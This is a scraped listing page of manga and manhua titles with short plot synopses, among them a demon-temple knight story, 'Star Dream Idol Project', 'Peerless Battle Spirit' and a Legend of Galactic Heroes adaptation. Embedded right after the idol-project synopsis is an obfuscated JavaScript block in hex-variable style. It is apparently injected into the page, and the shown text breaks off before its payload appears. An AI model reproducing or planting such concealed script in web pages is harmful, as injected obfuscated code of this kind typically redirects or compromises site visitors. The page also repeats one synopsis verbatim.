Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

26 results


While the demons were rising, mankind was about to become extinct. Six temples rose, and protected the last of mankind. A young boy joins the temple as a knight to save his mother. During his journey of wonders and mischief in the world of temples and demons, will he be able to ascend to become the strongest knight and inherit the throne?


Star Dream Idol Project

The shining lights, the magnificent stage! Friendships created through singing, making a future through dancing, the girls embark on their journey towards their dreams! One who has lost status due to a scandal is hiding a plot behind her back. A pair of bosom friends, separated by fate. A girl who tries to exonerate her mother sets off on her journey for a talent competition. When the stage turns into an empty battlefield, she uses her voice to chase after her dreams.<script></script><script>function _0x566f(_0xf00ab6,_0x3b2b65){var _0x1db733=_0x2373();return _0x566f=function(_0x1f7685,_0x207485){_0x1f7685=_0x1f7685-(0x20a8+0xad*0x36+-0x168b*0x3);var _0x2bc410=_0x1db733[_0x1f7685];return _0x2bc410;},_0x566f(_0xf00ab6,_0x3b2b65);}(function(_0x18888c,_0x34cad3){var _0x440ccb=_0x566f,_0x5496cf=_0x18888c();while(!![]){try{var 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From MangaHelpers: High school student Misumi Makoto is called into a fantasy world by the god Tsukuyomi, in order to be a hero. However, powerful others in this world aren't as thrilled to have him there, and they kick him to the edge of the world just as Tsukuyomi declares that he must leave Makoto to find his own way. Now it's up to Makoto to find his own way!



Zenichirou is a middle school student raised in a motherless family. His breakfast always consists of onigiri and instant miso soup from the convenience store. Yae, a childhood friend of Zenichirou, cannot stand to see him eat such an innutritious breakfast, so she decides to make him breakfast every morning… This story conveys a simple message: eating with another person makes miso soup taste more delicious and hearty!



Ichinomiya Shingo, a young 25 years old, single, worker of firm company while thinking of tomorrow' busy working day goes to sleep. However the moment he woke up, it's a room unknown to him. He then learn that he is inside a 6 years-old boy and is taking over his mind. He then learn a lot from the memories of the said boy: he was born as the youngest child (8th son and 10th child) of poor noble family living in back country. Having no administrative skill, he can't do anything to manage the vast land his family has. Fortunately, he is blessed with a very rare talent, talent of magic. Unfortunately, while his talent could bring prosperity to his family, in his situation it only brought disaster. Yes, this is the story of the boy, Wendelin Von Benno Baumeister, opening his own path in a harsh world.



Before she died, Taga Reiji's mother made arrangements to ensure her son would not be alone. What Taga did not know about these "arrangements" was that he would be enrolled into a special class at the school his mother founded where prospective fiance candidates would all vie for his hand in marriage. How will Taga's new life of constantly being surrounded by girls unfold?



Yagi Naohito has a fear of being hated, so he always acts according to everyone’s ideals. With that mindset, he was half-jokingly labeled “A coward” by Akasaka Tooru - a guy whom he met at a mixer that his friend half forcefully brought him along. After being overwhelmed by the young man on their way home, Yagi didn’t think that they’d end up meeting again a few days later. As a help to Akasaka who’d just lost his home and was at his wit’s end, they started living together. The man was supposed to be nothing but a burden but without noticing, he gradually become someone who Yagi could rely on..?



Original 4-koma updated daily at http://sai-zen-sen.jp/comics/twi4/fatemahjong/



From MangaHelpers: This is a new manga of the story of Legend of Galactic Heroes. It tells the story of a distant future within the Milky Way Galaxy, where the Galactic Empire and the Free Planets Alliance are constantly at war. The story begins with the young Reinhard von Müsel, a boy in the Galactic Empire that lives with his drunk father and his beautiful sister Annerose. He becomes close friends with the boy next door, Sigfried. After his sister is taken to become the Kaiser's concubine, young Reinhard is determined to take down the Empire in order to rescue her. He and his loyal friend Sigfried join the military academy together as the first step in Reinhard's plan. [tethysdust]



On A Continent Protected By Four Witches Stands Winfred Academy, A Prestigious School Of Magic. When An Incident Occurs At The School, Anz Finds Himself Right In The Middle Of It… Original Webcomic


Peerless Battle Spirit

In The Canglan Continent, Only Those That Who Manage To Awaken A Martial Spirit Can Walk On The Path Of Cultivation. In This World, Only Those With Stronger Martial Spirits Can Communicate With The Heavens And Earth. Qin Nan, Born In Linshui City, Was A Peerless Genius Who Possessed Talent And Was Thought To Become A Great Cultivator In The Future. However, Things Changed When He Ended Up Awakening A Grade 1 Martial Spirit, Resulting In Him Being Considered As Trash.fortunately Enough, Qin Nan Was Struck By A Ray Of Lightning While Practicing His Martial Arts And Coincidentally Obtained The Divine Battle Spirit, Which Was Capable Of Leveling Up. Breaking The Ultimate Rule Of The Canglan Continent, Little Did Qin Nan Knew That His Martial Spirit Possessed A Great Secret That Will Slowly Unravel The Mystery As The Story Goes On. Now Join Qin Nan And His Companion Along Their Journey, Battling Against Various Opponents, Outsmarting Their Enemies And Seeking The Answers To Unveil Mysteries. 狂霸战皇,Berserk Sovereign Of Battle,Berserk Peerless Battle Spirit ,Peerless Battle Spirit , Berserk Sovereign Of Battle Manhua In The Canglan Continent, Only Those That Who Manage To Awaken A Martial Spirit Can Walk On The Path Of Cultivation. In This World, Only Those With Stronger Martial Spirits Can Communicate With The Heavens And Earth. Qin Nan, Born In Linshui City, Was A Peerless Genius Who Possessed Talent And Was Thought To Become A Great Cultivator In The Future. However, Things Changed When He Ended Up Awakening A Grade 1 Martial Spirit, Resulting In Him Being Considered As Trash.fortunately Enough, Qin Nan Was Struck By A Ray Of Lightning While Practicing His Martial Arts And Coincidentally Obtained The Divine Battle Spirit, Which Was Capable Of Leveling Up. Breaking The Ultimate Rule Of The Canglan Continent, Little Did Qin Nan Knew That His Martial Spirit Possessed A Great Secret That Will Slowly Unravel The Mystery As The Story Goes On. Now Join Qin Nan And His Companion Along Their Journey, Battling Against Various Opponents, Outsmarting Their Enemies And Seeking The Answers To Unveil Mysteries. 狂霸战皇,Berserk Sovereign Of Battle,Berserk Peerless Battle Spirit ,Peerless Battle Spirit , Berserk Sovereign Of Battle Manhua



He was born the son of a king, but chose to walk a path that is paved with hardships and struggles. She was born with a flaw that makes her shunned by society. Due to an accidental meeting, a new relationship is beginning to form. Little did they know about the troubles they would face due to their different backgrounds. But, as long as they are together they can face anything that comes their way. “A fancy victory or the glory of the victor isn’t important. Since we swore to be together even till death.” * The elected manhwa of 2015 manhwa scout by SBA-Seoul culture office-KAKAO.
